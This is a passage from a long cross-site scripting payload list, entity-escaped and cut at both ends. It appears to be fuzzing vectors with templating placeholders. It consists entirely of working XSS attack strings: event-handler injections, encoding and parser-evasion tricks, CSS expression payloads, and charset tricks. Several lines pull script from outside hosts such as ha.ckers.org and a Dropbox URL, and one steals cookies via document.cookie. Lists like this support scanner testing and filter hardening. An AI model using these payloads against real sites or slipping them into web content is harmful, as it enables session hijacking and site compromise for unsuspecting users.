data=&#34;data:text/html;base64,%(base64)s&#34;&gt; &lt;embed src=&#34;data:text/html;base64,%(base64)s&#34;&gt; &lt;b &lt;script&gt;alert(1)&lt;/script&gt;0 &lt;div id=&#34;div1&#34;&gt;&lt;input value=&#34;``onmouseover=javascript:alert(1)&#34;&gt;&lt;/div&gt; &lt;div id=&#34;div2&#34;&gt;&lt;/div&gt;&lt;script&gt;document.getElementById(&#34;div2&#34;).innerHTML = document.getElementById(&#34;div1&#34;).innerHTML;&lt;/script&gt; &lt;x &#39;=&#34;foo&#34;&gt;&lt;x foo=&#39;&gt;&lt;img src=x onerror=javascript:alert(1)//&#39;&gt; &lt;embed src=&#34;javascript:alert(1)&#34;&gt; &lt;img src=&#34;javascript:alert(1)&#34;&gt; &lt;image src=&#34;javascript:alert(1)&#34;&gt; &lt;script src=&#34;javascript:alert(1)&#34;&gt; &lt;div style=width:1px;filter:glow onfilterchange=javascript:alert(1)&gt;x &lt;? foo=&#34;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34;&gt; &lt;! foo=&#34;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34;&gt; &lt;/ foo=&#34;&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34;&gt; &lt;? foo=&#34;&gt;&lt;x foo=&#39;?&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#39;&gt;&#34;&gt; &lt;! foo=&#34;[[[Inception]]&#34;&gt;&lt;x foo=&#34;]foo&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34;&gt; &lt;% foo&gt;&lt;x foo=&#34;%&gt;&lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34;&gt; &lt;div id=d&gt;&lt;x xmlns=&#34;&gt;&lt;iframe onload=javascript:alert(1)&#34;&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt; &lt;img \x00src=x onerror=&#34;alert(1)&#34;&gt; &lt;img \x47src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x11src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x12src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x47src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x10src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x13src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x32src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x47src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img\x11src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x47src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x34src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x39src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img \x00src=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x09=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x10=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x13=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x32=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x12=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x11=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x00=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src\x47=x onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src=x\x09onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src=x\x10onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src=x\x11onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src=x\x12onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img src=x\x13onerror=&#34;javascript:alert(1)&#34;&gt; &lt;img[a][b][c]src[d]=x[e]onerror=[f]&#34;alert(1)&#34;&gt; &lt;img src=x onerror=\x09&#34;javascript:alert(1)&#34;&gt; &lt;img src=x onerror=\x10&#34;javascript:alert(1)&#34;&gt; &lt;img src=x onerror=\x11&#34;javascript:alert(1)&#34;&gt; &lt;img src=x onerror=\x12&#34;javascript:alert(1)&#34;&gt; &lt;img src=x onerror=\x32&#34;javascript:alert(1)&#34;&gt; &lt;img src=x onerror=\x00&#34;javascript:alert(1)&#34;&gt; &lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(1)&gt;XXX&lt;/a&gt; &lt;img src=&#34;x &lt;script&gt;javascript:alert(1)&lt;/script&gt;&#34; &gt; &lt;img src onerror /&#34; &#39;&#34;= alt=javascript:alert(1)//&#34;&gt; &lt;title onpropertychange=javascript:alert(1)&gt;&lt;/title&gt;&lt;title title=&gt; &lt;a href=http://foo.bar/#x=y></a><img alt="&gt;&lt;img src=x:x onerror=javascript:alert(1)&gt;&lt;/a&gt;&#34;&gt; &lt;!--[if]&gt;&lt;script&gt;javascript:alert(1)&lt;/script --&gt; &lt;!--[if&lt;img src=x onerror=javascript:alert(1)//]&gt; --&gt; &lt;script src=&#34;/\%(jscript)s&#34;&gt;&lt;/script&gt; &lt;script src=&#34;\\%(jscript)s&#34;&gt;&lt;/script&gt; &lt;object id=&#34;x&#34; classid=&#34;clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598&#34;&gt;&lt;/object&gt; &lt;object classid=&#34;clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B&#34; onqt_error=&#34;javascript:alert(1)&#34; style=&#34;behavior:url(#x);&#34;&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt; &lt;a style=&#34;-o-link:&#39;javascript:javascript:alert(1)&#39;;-o-link-source:current&#34;&gt;X &lt;style&gt;p[foo=bar{}*{-o-link:&#39;javascript:javascript:alert(1)&#39;}{}*{-o-link-source:current}]{color:red};&lt;/style&gt; &lt;link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d &lt;style&gt;@import &#34;data:,*%7bx:expression(javascript:alert(1))%7D&#34;;&lt;/style&gt; &lt;a style=&#34;pointer-events:none;position:absolute;&#34;&gt;&lt;a style=&#34;position:absolute;&#34; onclick=&#34;javascript:alert(1);&#34;&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href=&#34;javascript:javascript:alert(1)&#34;&gt;XXX&lt;/a&gt; &lt;style&gt;*[{}@import&#39;%(css)s?]&lt;/style&gt;X &lt;div style=&#34;font-family:&#39;foo&amp;#10;;color:red;&#39;;&#34;&gt;XXX &lt;div style=&#34;font-family:foo}color=red;&#34;&gt;XXX &lt;// style=x:expression\28javascript:alert(1)\29&gt; &lt;style&gt;*{x:??????????(javascript:alert(1))}&lt;/style&gt; &lt;div style=content:url(%(svg)s)&gt;&lt;/div&gt; &lt;div style=&#34;list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));&#34;&gt;X &lt;div id=d&gt;&lt;div style=&#34;font-family:&#39;sans\27\3B color\3Ared\3B&#39;&#34;&gt;X&lt;/div&gt;&lt;/div&gt; &lt;script&gt;with(document.getElementById(&#34;d&#34;))innerHTML=innerHTML&lt;/script&gt; &lt;div style=&#34;background:url(/f#&amp;#127;oo/;color:red/*/foo.jpg);&#34;&gt;X &lt;div style=&#34;font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);&#34;&gt;X &lt;div id=&#34;x&#34;&gt;XXX&lt;/div&gt; &lt;style&gt; #x{font-family:foo[bar;color:green;} #y];color:red;{} &lt;/style&gt; &lt;x style=&#34;background:url(&#39;x&amp;#1;;color:red;/*&#39;)&#34;&gt;XXX&lt;/x&gt; &lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval&lt;/script&gt; &lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(1))})&lt;/script&gt; &lt;script&gt;ReferenceError.prototype.__defineGetter__(&#39;name&#39;, function(){javascript:alert(1)}),x&lt;/script&gt; &lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._(&#39;javascript:alert(1)&#39;)()&lt;/script&gt; &lt;meta charset=&#34;x-imap4-modified-utf7&#34;&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi &lt;meta charset=&#34;x-imap4-modified-utf7&#34;&gt;&amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt; &lt;meta charset=&#34;mac-farsi&#34;&gt;¼script¾javascript:alert(1)¼/script¾ X&lt;x style=behavior:url(#default#time2)onbegin=javascript:alert(1)&gt; 1&lt;set/xmlns=urn:schemas-microsoft-com:timestyle=beh&#x41vior:url(#default#time2)attributename=innerhtmlto=&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;&gt; 1&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(1)&amp;gt;&gt; &lt;vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss&gt;&lt;/vmlframe&gt; 1&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /&gt;&lt;/a&gt; &lt;a style=&#34;behavior:url(#default#AnchorClick);&#34; folder=&#34;javascript:javascript:alert(1)&#34;&gt;XXX&lt;/a&gt; &lt;x style=&#34;behavior:url(%(sct)s)&#34;&gt; &lt;xml id=&#34;xss&#34; src=&#34;%(htc)s&#34;&gt;&lt;/xml&gt; &lt;label dataformatas=&#34;html&#34; datasrc=&#34;#xss&#34; datafld=&#34;payload&#34;&gt;&lt;/label&gt; &lt;event-source src=&#34;%(event)s&#34; onload=&#34;javascript:alert(1)&#34;&gt; &lt;a href=&#34;javascript:javascript:alert(1)&#34;&gt;&lt;event-source src=&#34;data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A&#34;&gt; &lt;div id=&#34;x&#34;&gt;x&lt;/div&gt; &lt;xml:namespace prefix=&#34;t&#34;&gt; &lt;import namespace=&#34;t&#34; implementation=&#34;#default#time2&#34;&gt; &lt;t:set attributeName=&#34;innerHTML&#34; targetElement=&#34;x&#34; to=&#34;&amp;lt;img&amp;#11;src=x:x&amp;#11;onerror&amp;#11;=javascript:alert(1)&amp;gt;&#34;&gt; &lt;script&gt;%(payload)s&lt;/script&gt; &lt;script src=%(jscript)s&gt;&lt;/script&gt; &lt;script language=&#39;javascript&#39; src=&#39;%(jscript)s&#39;&gt;&lt;/script&gt; &lt;script&gt;javascript:alert(1)&lt;/script&gt; &lt;IMG SRC=&#34;javascript:javascript:alert(1);&#34;&gt; &lt;IMG SRC=javascript:javascript:alert(1)&gt; &lt;IMG SRC=javascript:javascript:alert(1)&gt; &lt;SCRIPT SRC=%(jscript)s?&lt;B&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=&#34;javascript:javascript:alert(1);&#34;&gt;&lt;/FRAMESET&gt; &lt;BODY ONLOAD=javascript:alert(1)&gt; &lt;BODY ONLOAD=javascript:javascript:alert(1)&gt; &lt;IMG SRC=&#34;jav ascript:javascript:alert(1);&#34;&gt; &lt;BODY onload!#$%%&amp;()*~+-_.,:;?@[/|\]^=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/XSS/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="jav&#65ascript:javascript:alert(1)">test1</a> <a href="jav&#97ascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(&#34;RSnake says, &#39;XSS&#39;&#34;)> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()~+-_.,:;?@[/|]^=alert(&#34;XSS&#34;)&gt; &lt;SCRIPT/SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;&lt;SCRIPT&gt;alert(&#34;XSS&#34;);//&lt;&lt;/SCRIPT&gt; &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; &lt;IMG SRC=&#34;javascript:alert(&#39;XSS&#39;)&#34; &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; \&#34;;alert(&#39;XSS&#39;);// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(&#34;XSS&#34;);&lt;/SCRIPT&gt; &lt;INPUT TYPE=&#34;IMAGE&#34; SRC=&#34;javascript:alert(&#39;XSS&#39;);&#34;&gt; &lt;BODY BACKGROUND=&#34;javascript:alert(&#39;XSS&#39;)&#34;&gt; &lt;IMG DYNSRC=&#34;javascript:alert(&#39;XSS&#39;)&#34;&gt; &lt;IMG LOWSRC=&#34;javascript:alert(&#39;XSS&#39;)&#34;&gt; &lt;STYLE&gt;li {list-style-image: url(&#34;javascript:alert(&#39;XSS&#39;)&#34;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt; &lt;IMG SRC=&#39;vbscript:msgbox(&#34;XSS&#34;)&#39;&gt; &lt;IMG SRC=&#34;livescript:[code]&#34;&gt; &lt;BODY ONLOAD=alert(&#39;XSS&#39;)&gt; &lt;BGSOUND SRC=&#34;javascript:alert(&#39;XSS&#39;);&#34;&gt; &lt;BR SIZE=&#34;&amp;{alert(&#39;XSS&#39;)}&#34;&gt; &lt;LINK REL=&#34;stylesheet&#34; HREF=&#34;javascript:alert(&#39;XSS&#39;);&#34;&gt; &lt;LINK REL=&#34;stylesheet&#34; HREF=&#34;http://ha.ckers.org/xss.css&#34;&gt; &lt;STYLE&gt;@import&#39;http://ha.ckers.org/xss.css&#39;;&lt;/STYLE&gt; &lt;META HTTP-EQUIV=&#34;Link&#34; Content=&#34;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&#34;&gt; &lt;STYLE&gt;BODY{-moz-binding:url(&#34;http://ha.ckers.org/xssmoz.xml#xss&#34;)}&lt;/STYLE&gt; &lt;STYLE&gt;@im\port&#39;\ja\vasc\ript:alert(&#34;XSS&#34;)&#39;;&lt;/STYLE&gt; &lt;IMG STYLE=&#34;xss:expr/*XSS*/ession(alert(&#39;XSS&#39;))&#34;&gt; exp/*&lt;A STYLE=&#39;no\xss:noxss(&#34;*//*&#34;);xss:ex/*XSS*//*/*/pression(alert(&#34;XSS&#34;))&#39;&gt; &lt;STYLE TYPE=&#34;text/javascript&#34;&gt;alert(&#39;XSS&#39;);&lt;/STYLE&gt; &lt;STYLE&gt;.XSS{background-image:url(&#34;javascript:alert(&#39;XSS&#39;)&#34;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=&#34;text/css&#34;&gt;BODY{background:url(&#34;javascript:alert(&#39;XSS&#39;)&#34;)}&lt;/STYLE&gt; &lt;STYLE type=&#34;text/css&#34;&gt;BODY{background:url(&#34;javascript:alert(&#39;XSS&#39;)&#34;)}&lt;/STYLE&gt; &lt;XSS STYLE=&#34;xss:expression(alert(&#39;XSS&#39;))&#34;&gt; &lt;XSS STYLE=&#34;behavior: url(xss.htc);&#34;&gt; ¼script¾alert(¢XSS¢)¼/script¾ &lt;META HTTP-EQUIV=&#34;refresh&#34; CONTENT=&#34;0;url=javascript:alert(&#39;XSS&#39;);&#34;&gt; &lt;META HTTP-EQUIV=&#34;refresh&#34; CONTENT=&#34;0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&#34;&gt; &lt;META HTTP-EQUIV=&#34;refresh&#34; CONTENT=&#34;0; URL=http://;URL=javascript:alert(&#39;XSS&#39;);&#34;&gt; &lt;IFRAME SRC=&#34;javascript:alert(&#39;XSS&#39;);&#34;&gt;&lt;/IFRAME&gt; &lt;IFRAME SRC=# onmouseover=&#34;alert(document.cookie)&#34;&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=&#34;javascript:alert(&#39;XSS&#39;);&#34;&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=&#34;javascript:alert(&#39;XSS&#39;)&#34;&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=&#34;javascript:alert(&#39;XSS&#39;)&#34;&gt; &lt;DIV STYLE=&#34;background-image: url(javascript:alert(&#39;XSS&#39;))&#34;&gt; &lt;DIV STYLE=&#34;background-image:\0075\0072\006C\0028&#39;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&#39;\0029&#34;&gt; &lt;DIV STYLE=&#34;background-image: url(&amp;#1;javascript:alert(&#39;XSS&#39;))&#34;&gt; &lt;DIV STYLE=&#34;width: expression(alert(&#39;XSS&#39;));&#34;&gt; &lt;BASE HREF=&#34;javascript:alert(&#39;XSS&#39;);//&#34;&gt; &lt;OBJECT TYPE=&#34;text/x-scriptlet&#34; DATA=&#34;http://ha.ckers.org/scriptlet.html&#34;&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=&#34;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&#34; type=&#34;image/svg+xml&#34; AllowScriptAccess=&#34;always&#34;&gt;&lt;/EMBED&gt; &lt;SCRIPT SRC=&#34;http://ha.ckers.org/xss.jpg&#34;&gt;&lt;/SCRIPT&gt; &lt;!--#exec cmd=&#34;/bin/echo &#39;&lt;SCR&#39;&#34;--&gt;&lt;!--#exec cmd=&#34;/bin/echo &#39;IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&#39;&#34;--&gt; &lt;? echo(&#39;&lt;SCR)&#39;;echo(&#39;IPT&gt;alert(&#34;XSS&#34;)&lt;/SCRIPT&gt;&#39;); ?&gt; &lt;IMG SRC=&#34;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&#34;&gt; Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser &lt;META HTTP-EQUIV=&#34;Set-Cookie&#34; Content=&#34;USERID=&lt;SCRIPT&gt;alert(&#39;XSS&#39;)&lt;/SCRIPT&gt;&#34;&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=&#34;CONTENT-TYPE&#34; CONTENT=&#34;text/html; charset=UTF-7&#34;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&#39;XSS&#39;);+ADw-/SCRIPT+AD4- &lt;SCRIPT a=&#34;&gt;&#34; SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =&#34;&gt;&#34; SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=&#34;&gt;&#34; &#39;&#39; SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT &#34;a=&#39;&gt;&#39;&#34; SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=>SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=&#34;&gt;&#39;&gt;&#34; SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document.write(&#34;&lt;SCRI&#34;);&lt;/SCRIPT&gt;PT SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;&lt;/SCRIPT&gt; &lt;A HREF=&#34;http://66.102.7.147/&#34;&gt;XSS&lt;/A&gt; &lt;A HREF=&#34;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&#34;&gt;XSS&lt;/A&gt; &lt;A HREF=&#34;http://1113982867/&#34;&gt;XSS&lt;/A&gt; &lt;A HREF=&#34;http://0x42.0x0000066.0x7.0x93/&#34;&gt;XSS&lt;/A&gt; &lt;A HREF=&#34;http://0102.0146.0007.00000223/&#34;&gt;XSS&lt;/A&gt; &lt;A HREF=&#34;htt p://6 6.000146.0x7.147/&#34;&gt;XSS&lt;/A&gt; &lt;iframe %00 src=&#34;&amp;Tab;javascript:prompt(1)&amp;Tab;&#34;%00&gt; &lt;svg&gt;&lt;style&gt;{font-family&amp;colon;&#39;&lt;iframe/onload=confirm(1)&gt;&#39; &lt;input/onmouseover=&#34;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;&#34; &lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar; {Opera} &lt;img/src=%00onerror=this.onerror=confirm(1) &lt;form&gt;&lt;isindex formaction=&#34;javascript&amp;colon;confirm(1)&#34; &lt;img src=%00&amp;NewLine; onerror=alert(1)&amp;NewLine; &lt;script/&amp;Tab; src=&#39;https://dl.dropbox.com/u/13018058/js.js&#39; /&amp;Tab;&gt;&lt;/script&gt; &lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=? &lt;iframe/src=&#34;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==&#34;&gt; &lt;script /*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/ &amp;#34;&amp;#62;&lt;h1/onmouseover=&#39;\u0061lert(1)&#39;&gt;%00 &lt;iframe/src=&#34;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;&#34;&gt; &lt;meta content=&#34;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)&#34; http-equiv=&#34;refresh&#34;/&gt; &lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(&#39;https://www.google.com/&#39;)&gt;&lt;/script &lt;svg&gt;&lt;script x:href=&#39;https://dl.dropbox.com/u/13018058/js.js&#39; {Opera} &lt;meta http-equiv=&#34;refresh&#34; content=&#34;0;url=javascript:confirm(1)&#34;&gt; &lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt; &lt;form&gt;&lt;a href=&#34;javascript:\u0061lert&amp;#x28;1&amp;#x29;&#34;&gt;X &lt;/script&gt;&lt;img/*%00/src=&#34;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;&#34;/%00*/onerror=&#39;eval(src)&#39;&gt; &lt;img/&amp;#09;&amp;#10;&amp;#11; src=~onerror=prompt(1)&gt; &lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=&#34;javascript&amp;#58;alert(1)&#34;&amp;#11;&amp;#10;&amp;#09;;&gt; &lt;a 